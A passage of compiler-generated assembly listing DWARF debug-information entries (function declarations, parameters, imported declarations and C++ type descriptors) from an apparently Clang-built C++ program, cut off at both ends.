.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c14:0x11 DW_TAG_subprogram
.long .Linfo_string412 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 117 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c1f:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c25:0x11 DW_TAG_subprogram
.long .Linfo_string413 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 120 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c30:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c36:0x11 DW_TAG_subprogram
.long .Linfo_string414 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 125 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c41:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c47:0x11 DW_TAG_subprogram
.long .Linfo_string415 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 130 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c52:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c58:0x11 DW_TAG_subprogram
.long .Linfo_string416 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 135 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c63:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c69:0x11 DW_TAG_subprogram
.long .Linfo_string417 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 140 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c74:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c7a:0x16 DW_TAG_subprogram
.long .Linfo_string418 # DW_AT_name
.byte 36 # DW_AT_decl_file
.byte 55 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c85:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 10 # Abbrev [10] 0x2c8a:0x5 DW_TAG_formal_parameter
.long 11128 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2c90:0x11 DW_TAG_subprogram
.long .Linfo_string419 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 166 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2c9b:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2ca1:0x11 DW_TAG_subprogram
.long .Linfo_string420 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 169 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2cac:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2cb2:0x11 DW_TAG_subprogram
.long .Linfo_string421 # DW_AT_name
.byte 36 # DW_AT_decl_file
.byte 52 # DW_AT_decl_line
.long 11128 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2cbd:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2cc3:0x11 DW_TAG_subprogram
.long .Linfo_string422 # DW_AT_name
.byte 38 # DW_AT_decl_file
.byte 155 # DW_AT_decl_line
.long 11149 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2cce:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 20 # Abbrev [20] 0x2cd4:0xb DW_TAG_typedef
.long 11487 # DW_AT_type
.long .Linfo_string423 # DW_AT_name
.byte 39 # DW_AT_decl_file
.byte 24 # DW_AT_decl_line
.byte 74 # Abbrev [74] 0x2cdf:0x1 DW_TAG_structure_type
# DW_AT_declaration
.byte 43 # Abbrev [43] 0x2ce0:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 38 # DW_AT_decl_line
.long 9142 # DW_AT_import
.byte 43 # Abbrev [43] 0x2ce7:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 39 # DW_AT_decl_line
.long 9173 # DW_AT_import
.byte 43 # Abbrev [43] 0x2cee:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 40 # DW_AT_decl_line
.long 9390 # DW_AT_import
.byte 43 # Abbrev [43] 0x2cf5:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 43 # DW_AT_decl_line
.long 9197 # DW_AT_import
.byte 43 # Abbrev [43] 0x2cfc:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 46 # DW_AT_decl_line
.long 9603 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d03:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 51 # DW_AT_decl_line
.long 9089 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d0a:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 52 # DW_AT_decl_line
.long 9101 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d11:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 54 # DW_AT_decl_line
.long 5503 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d18:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 55 # DW_AT_decl_line
.long 9215 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d1f:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 56 # DW_AT_decl_line
.long 9232 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d26:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 57 # DW_AT_decl_line
.long 9250 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d2d:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 58 # DW_AT_decl_line
.long 9268 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d34:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 59 # DW_AT_decl_line
.long 9344 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d3b:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 60 # DW_AT_decl_line
.long 8079 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d42:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 61 # DW_AT_decl_line
.long 9404 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d49:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 62 # DW_AT_decl_line
.long 9418 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d50:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 63 # DW_AT_decl_line
.long 9436 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d57:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 64 # DW_AT_decl_line
.long 9454 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d5e:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 65 # DW_AT_decl_line
.long 9477 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d65:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 67 # DW_AT_decl_line
.long 9495 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d6c:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 68 # DW_AT_decl_line
.long 9518 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d73:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 69 # DW_AT_decl_line
.long 9546 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d7a:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 71 # DW_AT_decl_line
.long 9574 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d81:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 72 # DW_AT_decl_line
.long 9617 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d88:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 73 # DW_AT_decl_line
.long 9629 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d8f:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 74 # DW_AT_decl_line
.long 9652 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d96:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 75 # DW_AT_decl_line
.long 9666 # DW_AT_import
.byte 43 # Abbrev [43] 0x2d9d:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 76 # DW_AT_decl_line
.long 9698 # DW_AT_import
.byte 43 # Abbrev [43] 0x2da4:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 77 # DW_AT_decl_line
.long 9725 # DW_AT_import
.byte 43 # Abbrev [43] 0x2dab:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 78 # DW_AT_decl_line
.long 9752 # DW_AT_import
.byte 43 # Abbrev [43] 0x2db2:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 80 # DW_AT_decl_line
.long 9770 # DW_AT_import
.byte 43 # Abbrev [43] 0x2db9:0x7 DW_TAG_imported_declaration
.byte 41 # DW_AT_decl_file
.byte 81 # DW_AT_decl_line
.long 9798 # DW_AT_import
.byte 68 # Abbrev [68] 0x2dc0:0x1b DW_TAG_subprogram
.long .Linfo_string425 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 84 # DW_AT_decl_line
.long 9305 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2dcb:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 10 # Abbrev [10] 0x2dd0:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 10 # Abbrev [10] 0x2dd5:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2ddb:0x1b DW_TAG_subprogram
.long .Linfo_string426 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 64 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2de6:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 10 # Abbrev [10] 0x2deb:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 10 # Abbrev [10] 0x2df0:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2df6:0x1b DW_TAG_subprogram
.long .Linfo_string427 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 43 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2e01:0x5 DW_TAG_formal_parameter
.long 10369 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e06:0x5 DW_TAG_formal_parameter
.long 10541 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e0b:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2e11:0x1b DW_TAG_subprogram
.long .Linfo_string428 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 47 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2e1c:0x5 DW_TAG_formal_parameter
.long 6409 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e21:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e26:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2e2c:0x1b DW_TAG_subprogram
.long .Linfo_string429 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 61 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2e37:0x5 DW_TAG_formal_parameter
.long 6409 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e3c:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e41:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2e47:0x16 DW_TAG_subprogram
.long .Linfo_string430 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 130 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2e52:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e57:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2e5d:0x16 DW_TAG_subprogram
.long .Linfo_string431 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 137 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2e68:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e6d:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2e73:0x16 DW_TAG_subprogram
.long .Linfo_string432 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 144 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2e7e:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e83:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2e89:0x16 DW_TAG_subprogram
.long .Linfo_string433 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 122 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2e94:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x2e99:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2e9f:0x17 DW_TAG_subprogram
.long .Linfo_string434 # DW_AT_name
.byte 42 # DW_AT_decl_file
.short 273 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2eab:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2eb0:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2eb6:0x12 DW_TAG_subprogram
.long .Linfo_string435 # DW_AT_name
.byte 42 # DW_AT_decl_file
.short 397 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2ec2:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2ec8:0x12 DW_TAG_subprogram
.long .Linfo_string436 # DW_AT_name
.byte 42 # DW_AT_decl_file
.short 385 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2ed4:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2eda:0x1b DW_TAG_subprogram
.long .Linfo_string437 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 133 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2ee5:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x2eea:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x2eef:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2ef5:0x1b DW_TAG_subprogram
.long .Linfo_string438 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 140 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2f00:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f05:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f0a:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2f10:0x1b DW_TAG_subprogram
.long .Linfo_string439 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 125 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2f1b:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f20:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f25:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2f2b:0x17 DW_TAG_subprogram
.long .Linfo_string440 # DW_AT_name
.byte 42 # DW_AT_decl_file
.short 277 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2f37:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f3c:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2f42:0x17 DW_TAG_subprogram
.long .Linfo_string441 # DW_AT_name
.byte 42 # DW_AT_decl_file
.short 336 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2f4e:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f53:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2f59:0x1b DW_TAG_subprogram
.long .Linfo_string442 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 147 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2f64:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f69:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f6e:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2f74:0x16 DW_TAG_subprogram
.long .Linfo_string443 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 219 # DW_AT_decl_line
.long 6689 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2f7f:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f84:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2f8a:0x17 DW_TAG_subprogram
.long .Linfo_string444 # DW_AT_name
.byte 42 # DW_AT_decl_file
.short 296 # DW_AT_decl_line
.long 6689 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2f96:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2f9b:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2fa1:0x16 DW_TAG_subprogram
.long .Linfo_string445 # DW_AT_name
.byte 42 # DW_AT_decl_file
.byte 246 # DW_AT_decl_line
.long 6689 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2fac:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2fb1:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2fb7:0x17 DW_TAG_subprogram
.long .Linfo_string446 # DW_AT_name
.byte 42 # DW_AT_decl_file
.short 323 # DW_AT_decl_line
.long 6689 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2fc3:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2fc8:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 37 # Abbrev [37] 0x2fce:0x5 DW_TAG_const_type
.long 6333 # DW_AT_type
.byte 39 # Abbrev [39] 0x2fd3:0x5 DW_TAG_pointer_type
.long 12248 # DW_AT_type
.byte 37 # Abbrev [37] 0x2fd8:0x5 DW_TAG_const_type
.long 5678 # DW_AT_type
.byte 20 # Abbrev [20] 0x2fdd:0xb DW_TAG_typedef
.long 5772 # DW_AT_type
.long .Linfo_string471 # DW_AT_name
.byte 48 # DW_AT_decl_file
.byte 83 # DW_AT_decl_line
.byte 39 # Abbrev [39] 0x2fe8:0x5 DW_TAG_pointer_type
.long 982 # DW_AT_type
.byte 69 # Abbrev [69] 0x2fed:0x5 DW_TAG_reference_type
.long 12274 # DW_AT_type
.byte 37 # Abbrev [37] 0x2ff2:0x5 DW_TAG_const_type
.long 1044 # DW_AT_type
.byte 39 # Abbrev [39] 0x2ff7:0x5 DW_TAG_pointer_type
.long 12284 # DW_AT_type
.byte 37 # Abbrev [37] 0x2ffc:0x5 DW_TAG_const_type
.long 982 # DW_AT_type
.byte 69 # Abbrev [69] 0x3001:0x5 DW_TAG_reference_type
.long 1044 # DW_AT_type
.byte 39 # Abbrev [39] 0x3006:0x5 DW_TAG_pointer_type
.long 1702 # DW_AT_type
.byte 69 # Abbrev [69] 0x300b:0x5 DW_TAG_reference_type
.long 12304 # DW_AT_type
.byte 37 # Abbrev [37] 0x3010:0x5 DW_TAG_const_type
.long 1785 # DW_AT_type
.byte 69 # Abbrev [69] 0x3015:0x5 DW_TAG_reference_type
.long 1702 # DW_AT_type
.byte 69 # Abbrev [69] 0x301a:0x5 DW_TAG_reference_type
.long 12319 # DW_AT_type
.byte 37 # Abbrev [37] 0x301f:0x5 DW_TAG_const_type
.long 1702 # DW_AT_type
.byte 69 # Abbrev [69] 0x3024:0x5 DW_TAG_reference_type
.long 12329 # DW_AT_type
.byte 37 # Abbrev [37] 0x3029:0x5 DW_TAG_const_type
.long 1182 # DW_AT_type
.byte 69 # Abbrev [69] 0x302e:0x5 DW_TAG_reference_type
.long 12339 # DW_AT_type
.byte 37 # Abbrev [37] 0x3033:0x5 DW_TAG_const_type
.long 2507 # DW_AT_type
.byte 69 # Abbrev [69] 0x3038:0x5 DW_TAG_reference_type
.long 12349 # DW_AT_type
.byte 37 # Abbrev [37] 0x303d:0x5 DW_TAG_const_type
.long 1970 # DW_AT_type
.byte 40 # Abbrev [40] 0x3042:0xc DW_TAG_array_type
# DW_AT_GNU_vector
.long 3509 # DW_AT_type
.byte 41 # Abbrev [41] 0x3047:0x6 DW_TAG_subrange_type
.long 3516 # DW_AT_type
.byte 2 # DW_AT_count
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x304e:0x5 DW_TAG_pointer_type
.long 1191 # DW_AT_type
.byte 69 # Abbrev [69] 0x3053:0x5 DW_TAG_reference_type
.long 12376 # DW_AT_type
.byte 37 # Abbrev [37] 0x3058:0x5 DW_TAG_const_type
.long 1253 # DW_AT_type
.byte 39 # Abbrev [39] 0x305d:0x5 DW_TAG_pointer_type
.long 12386 # DW_AT_type
.byte 37 # Abbrev [37] 0x3062:0x5 DW_TAG_const_type
.long 1191 # DW_AT_type
.byte 69 # Abbrev [69] 0x3067:0x5 DW_TAG_reference_type
.long 1253 # DW_AT_type
.byte 39 # Abbrev [39] 0x306c:0x5 DW_TAG_pointer_type
.long 1970 # DW_AT_type
.byte 69 # Abbrev [69] 0x3071:0x5 DW_TAG_reference_type
.long 12406 # DW_AT_type
.byte 37 # Abbrev [37] 0x3076:0x5 DW_TAG_const_type
.long 2053 # DW_AT_type
.byte 69 # Abbrev [69] 0x307b:0x5 DW_TAG_reference_type
.long 1970 # DW_AT_type
.byte 69 # Abbrev [69] 0x3080:0x5 DW_TAG_reference_type
.long 12421 # DW_AT_type
.byte 37 # Abbrev [37] 0x3085:0x5 DW_TAG_const_type
.long 2628 # DW_AT_type
.byte 39 # Abbrev [39] 0x308a:0x5 DW_TAG_pointer_type
.long 2628 # DW_AT_type
.byte 69 # Abbrev [69] 0x308f:0x5 DW_TAG_reference_type
.long 12436 # DW_AT_type
.byte 37 # Abbrev [37] 0x3094:0x5 DW_TAG_const_type
.long 5867 # DW_AT_type
.byte 69 # Abbrev [69] 0x3099:0x5 DW_TAG_reference_type
.long 2628 # DW_AT_type
.byte 81 # Abbrev [81] 0x309e:0x31 DW_TAG_subprogram
.long 90 # DW_AT_specification
.byte 1 # DW_AT_inline
.byte 5 # Abbrev [5] 0x30a4:0x9 DW_TAG_template_type_parameter
.long 12411 # DW_AT_type
.long .Linfo_string535 # DW_AT_name
.byte 8 # Abbrev [8] 0x30ad:0xb DW_TAG_GNU_template_parameter_pack
.long .Linfo_string536 # DW_AT_name
.byte 9 # Abbrev [9] 0x30b2:0x5 DW_TAG_template_type_parameter
.long 12441 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 16 # Abbrev [16] 0x30b8:0xb DW_TAG_formal_parameter
.long .Linfo_string539 # DW_AT_name
.byte 1 # DW_AT_decl_file
.byte 87 # DW_AT_decl_line
.long 12411 # DW_AT_type
.byte 16 # Abbrev [16] 0x30c3:0xb DW_TAG_formal_parameter
.long .Linfo_string540 # DW_AT_name
.byte 1 # DW_AT_decl_file
.byte 87 # DW_AT_decl_line
.long 12441 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 70 # Abbrev [70] 0x30cf:0x5 DW_TAG_unspecified_type
.long .Linfo_string543 # DW_AT_name
.byte 39 # Abbrev [39] 0x30d4:0x5 DW_TAG_pointer_type
.long 3435 # DW_AT_type
.byte 71 # Abbrev [71] 0x30d9:0x5 DW_TAG_rvalue_reference_type
.long 1970 # DW_AT_type
.byte 71 # Abbrev [71] 0x30de:0x5 DW_TAG_rvalue_reference_type
.long 2628 # DW_AT_type
.byte 82 # Abbrev [82] 0x30e3:0x3e DW_TAG_subprogram
.long 1702 # DW_AT_type
.long 136 # DW_AT_specification
.byte 1 # DW_AT_inline
.long 12545 # DW_AT_object_pointer
.byte 8 # Abbrev [8] 0x30f1:0x10 DW_TAG_GNU_template_parameter_pack
.long .Linfo_string536 # DW_AT_name
.byte 9 # Abbrev [9] 0x30f6:0x5 DW_TAG_template_type_parameter
.long 1970 # DW_AT_type
.byte 9 # Abbrev [9] 0x30fb:0x5 DW_TAG_template_type_parameter
.long 2628 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 83 # Abbrev [83] 0x3101:0x9 DW_TAG_formal_parameter
.long .Linfo_string544 # DW_AT_name
.long 12577 # DW_AT_type
# DW_AT_artificial
.byte 16 # Abbrev [16] 0x310a:0xb DW_TAG_formal_parameter
.long .Linfo_string540 # DW_AT_name
.byte 1 # DW_AT_decl_file
.byte 87 # DW_AT_decl_line
.long 12505 # DW_AT_type
.byte 16 # Abbrev [16] 0x3115:0xb DW_TAG_formal_parameter
.long .Linfo_string540 # DW_AT_name
.byte 1 # DW_AT_decl_file
.byte 87 # DW_AT_decl_line
.long 12510 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x3121:0x5 DW_TAG_pointer_type
.long 3435 # DW_AT_type
